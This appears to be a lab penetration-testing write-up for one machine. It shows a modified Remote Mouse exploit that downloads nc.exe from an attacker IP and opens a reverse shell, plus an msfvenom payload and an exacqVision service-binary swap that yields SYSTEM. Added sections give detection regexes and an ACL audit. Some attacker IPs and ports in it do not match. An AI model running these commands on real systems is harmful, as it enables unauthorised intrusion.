89 - Esm

The document summarizes the findings of a vulnerability assessment on a machine located at 192.168.xx.89. Several open ports were discovered including port 21, 80, 139, 445, 1978, 1979, and 8090. Port 1978 was identified as the Remotemouse service which had a known exploit. This exploit was modified to launch a reverse shell back to the attacker's machine. User-level access was gained. Further enumeration revealed an exploitable Exacqvision ESM installation on port 8090. An exploit was used to replace the legitimate application file with a malicious one, granting system-level access when the machine restarted.

Uploaded by qzombexzombe114

89 ESM Writeup

1 | Page
.89 Machine

Open ports

21      FileZilla (FTP)
80      Apache (exacq ESM)
135
139
445
1978    Remote Mouse
1979
1980
8090    Apache 2.4.43, /project/

21: can connect anonymously


There is a project.zip you can download.

Zip file contains:

.editorconfig

On 8090 there is a directory with the same name as the zip file:

192.168.xx.89:8090/project/

Tried to enumerate it and found a Laravel app.

Folders:

The .env file contains an app key (tried msf, and decrypting or exploiting the app with the .env key, but it did not work).

Also on

/storage/framework/sessions/
Found sessions

But that is useless.

We noticed that port 1978 is open. We googled it and found that the port belongs to Remote Mouse:

https://wintelguy.com/port-search/1978

Or simply

nmap 192.168.xx.89 -p1978 -nv

The response is SIN 15win nop nop 300

We found the exploit for Remote Mouse:

https://www.exploit-db.com/exploits/46697

But it needs some modifications to work properly.

The modification: add a PowerShell reverse shell one-liner to the exploit's payload.

Ref:

https://hackersinterview.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/

Add the IP and port.

Open a terminal:

nc -lnvp 445

Run the exploit.

Then you are user.

Alternative: you can also do it with nc.exe

(GOLDEN)

First upload ncat:

def PopCalc(ip):
    # Click the desktop, open PowerShell and fetch nc.exe from the attacking host
    MoveMouse(-5000,3000,ip)
    MousePress(mouse.leftClick,ip)
    sleep(2)
    SendString('''powershell''',ip)
    sleep(3)
    SendString("\n",ip)
    sleep(5)
    # One line; backslashes doubled so Python does not read \U as a unicode escape
    SendString('''Invoke-WebRequest -Uri 'http://192.168.101.13/nc.exe' -OutFile C:\\Users\\Public\\nc.exe ''',ip)
    sleep(1)
    SendString("\n",ip)
    sleep(1)
    print("SUCCESS! Process calc.exe has run on target",ip)   # message left over from the original PoC

Then edit the exploit again with:

def PopCalc(ip):
    # Click the desktop, open cmd.exe and start the uploaded nc.exe as a reverse shell
    MoveMouse(-5000,3000,ip)
    MousePress(mouse.leftClick,ip)
    sleep(1)
    SendString('''cmd.exe''',ip)
    sleep(1)
    SendString("\n",ip)
    sleep(1)
    # Straight quotes and doubled backslashes; the listener port here is 1212
    SendString("C:\\Users\\Public\\nc.exe 192.168.101.13 1212 -e cmd.exe",ip)
    sleep(1)
    SendString("\n",ip)
    sleep(1)
    print("SUCCESS! Process calc.exe has run on target",ip)   # message left over from the original PoC

Or
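The two payloads above leave a small, fixed footprint on the host: a download typed into PowerShell that lands in C:\Users\Public, a binary executed from that folder, and nc.exe started with -e cmd.exe. The following Python is an added example written for this page, not code from the writeup or from Remote Mouse; it runs those three indicators over constructed process-creation records shaped like Sysmon Event ID 1 fields (Image, CommandLine, ParentImage, User), assuming the log pipeline has already flattened each event to a dict.

```python
"""Host-side detection for the keystroke-injection chain the writeup uses over
Remote Mouse: a typed PowerShell download into C:\\Users\\Public, then nc.exe run
with -e cmd.exe.

Added example, not code from the writeup or from Remote Mouse. The records are
constructed in the shape of Sysmon Event ID 1 (process creation) fields, and the
assumption is that the log pipeline has already flattened each event to a dict.
"""
import re

# Constructed sample events. Injected keystrokes land in the interactive session, so
# the processes look like normal user launches (parent explorer.exe / cmd.exe); the
# rules therefore key on the command line and the image path, not on the parent.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Invoke-WebRequest -Uri 'http://192.168.101.13/nc.exe' "
                    r"-OutFile C:\Users\Public\nc.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": "ESM\\alice"},
    {"Image": r"C:\Users\Public\nc.exe",
     "CommandLine": r"C:\Users\Public\nc.exe 192.168.101.13 1212 -e cmd.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": "ESM\\alice"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Get-ChildItem C:\Temp",
     "ParentImage": r"C:\Windows\explorer.exe", "User": "ESM\\alice"},
]

# World-writable staging folder used by both payloads on the page.
PUBLIC_DIR = re.compile(r"c:\\users\\public\\", re.IGNORECASE)
# Common download primitives typed into a shell.
WEB_DOWNLOAD = re.compile(
    r"invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b|downloadfile|start-bitstransfer",
    re.IGNORECASE)
# netcat handing a shell to cmd.exe.
NC_EXEC = re.compile(r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*\s-e\s+\S*cmd(?:\.exe)?",
                     re.IGNORECASE)


def classify(event):
    """Return the indicator names matched by one process-creation event."""
    hits = []
    cmd = event.get("CommandLine", "")
    if WEB_DOWNLOAD.search(cmd) and PUBLIC_DIR.search(cmd):
        hits.append("download_to_public")
    if PUBLIC_DIR.search(event.get("Image", "")):
        hits.append("exec_from_public")
    if NC_EXEC.search(cmd):
        hits.append("netcat_bind_cmd")
    return hits


def scan(events):
    """Return (index, hits) for every event that matched at least one indicator."""
    results = []
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["User"], SAMPLE_EVENTS[idx]["Image"], hits)
```

The first two sample events trigger, the benign PowerShell listing does not. Because Remote Mouse types into whatever session is on screen, the parent process tells you nothing; the command line and the image path are what carry the signal. Alongside the detection, the obvious hardening is to keep 1978/1979 off any network segment that does not need mouse control and to remove Remote Mouse from hosts that do not require it.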

Privesc:

Enumeration reveals the vulnerable service.

exacqVision ESM is likely vulnerable; it is on port 8090.

We found the version on the login form:

exacqVision ESM 5.12.2

We found the privesc exploit:

1. Generate malicious .exe on attacking machine

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.163 LPORT=443 -f exe > /var/www/html/enterprisesystemmanager.exe

2. Set up listener and ensure apache is running on attacking machine

nc -nlvvp 443
service apache2 start

3. Download malicious .exe on victim machine

powershell Invoke-WebRequest -Uri 'http://192.168.101.13/enterprisesystemmanager.exe' -OutFile C:\Users\Public\enterprisesystemmanager.exe

4. Rename C:\exacqVisionEsm\EnterpriseSystemManager\enterprisesystemmanager.exe

enterprisesystemmanager.exe -> enterprisesystemmanager.bak

5. Copy/move the downloaded enterprisesystemmanager.exe file to

C:\exacqVisionEsm\EnterpriseSystemManager\

6. Restart victim machine

shutdown /r

and set up a listener: nc -nvlp 80

7. Reverse shell on attacking machine opens

C:\Windows\system32>whoami
whoami
nt authority\system
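Steps 4 and 5 only work because a low-privileged user can rename and add files inside the directory of a service that runs as SYSTEM. The following Python is an added example written for this page, not code from the writeup or from exacqVision: it parses the text that the Windows tool icacls prints for a directory and reports any ACE that gives a low-privileged principal write-capable rights there. The icacls output below is constructed, and the Modify grant to BUILTIN\Users in it is an illustrative assumption, not a statement about what the product ships with.

```python
"""Audit of the service binary directory the privesc abuses: if low-privileged
users can write to C:\\exacqVisionEsm\\EnterpriseSystemManager, the SYSTEM service
binary inside it can be swapped and runs as SYSTEM on the next restart.

Added example, not code from the writeup or from exacqVision. It parses the text
that the Windows tool `icacls <path>` prints, so it can run offline on captured
output; the sample output below is constructed, and the Modify grant to
BUILTIN\\Users in it is an illustrative assumption.
"""
import re

SERVICE_DIR = r"C:\exacqVisionEsm\EnterpriseSystemManager"

# Constructed `icacls` output for a weak directory (the first ACE shares the path's line).
SAMPLE_ICACLS_WEAK = """\
C:\\exacqVisionEsm\\EnterpriseSystemManager BUILTIN\\Users:(OI)(CI)(M)
                                           NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
                                           BUILTIN\\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed output after hardening: Users keep read/execute only.
SAMPLE_ICACLS_HARDENED = """\
C:\\exacqVisionEsm\\EnterpriseSystemManager BUILTIN\\Users:(OI)(CI)(RX)
                                           NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
                                           BUILTIN\\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals every interactive or network user effectively belongs to.
LOW_PRIV = {"BUILTIN\\Users", "Everyone", "NT AUTHORITY\\Authenticated Users",
            "NT AUTHORITY\\INTERACTIVE", "BUILTIN\\Guests"}
# icacls inheritance markers, which are not rights.
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}
# Simple rights and specific rights that allow adding, replacing or renaming files.
WRITE_RIGHTS = {"F", "M", "W", "D", "GA", "GW", "WD", "AD", "DC", "DE", "WDAC", "WO"}

ACE_RE = re.compile(r"(?P<who>[^:]+?):(?P<perms>(?:\([^)]*\))+)\s*$")


def parse_icacls(text, path):
    """Return [(principal, [flag, ...])] for every ACE icacls printed for `path`."""
    aces = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.lower().startswith(path.lower()):   # first ACE follows the path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if m:
            aces.append((m.group("who"), re.findall(r"\(([^)]*)\)", m.group("perms"))))
    return aces


def grants_write(flags):
    """True if an ACE's flags (e.g. ["OI", "CI", "M"] or ["I", "RX,W"]) allow writing."""
    rights = {tok.strip().upper() for f in flags for tok in f.split(",")} - INHERIT_FLAGS
    return bool(rights & WRITE_RIGHTS)


def weak_aces(text, path):
    """ACEs that let a low-privileged principal write into the service directory."""
    return [(who, flags) for who, flags in parse_icacls(text, path)
            if who in LOW_PRIV and grants_write(flags)]


if __name__ == "__main__":
    for label, sample in (("weak", SAMPLE_ICACLS_WEAK), ("hardened", SAMPLE_ICACLS_HARDENED)):
        print(label, weak_aces(sample, SERVICE_DIR))
```

On a live host, feed the output of `icacls C:\exacqVisionEsm\EnterpriseSystemManager` (for example via subprocess.run with capture_output=True and text=True) to weak_aces; an empty result means no low-privileged principal can stage the swap. Remediation is to remove the write grant (icacls with /remove:g on the principal, then /grant with (OI)(CI)(RX) so users keep read and execute), confirm the service binary's hash or signature matches the vendor's, and alert on any rename or new file under the service directory by a non-SYSTEM account, which is exactly the footprint of steps 4 and 5.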
